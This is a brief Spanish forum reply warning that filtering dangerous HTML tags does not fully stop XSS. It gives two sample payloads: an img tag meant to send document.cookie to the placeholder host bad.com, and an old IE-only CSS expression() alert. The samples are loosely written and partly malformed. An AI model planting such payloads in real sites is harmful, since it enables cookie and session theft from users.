hola... se dice, que a pesar de eliminar los tags "perjudiciales" aun pueden meterte algún código
XSS y pueden ejecutarlo, osea... javascript
mira este ejemplo, demás te sugiero investigues el tema...
Código HTML:
<img src="document.location.href='http://bad.com/a/page.php?'+document.cookie;"/>
<span style="color:expresion(alert(true))">foo</span>
el segundo solo funciona en IE, pero bueno....
suerte!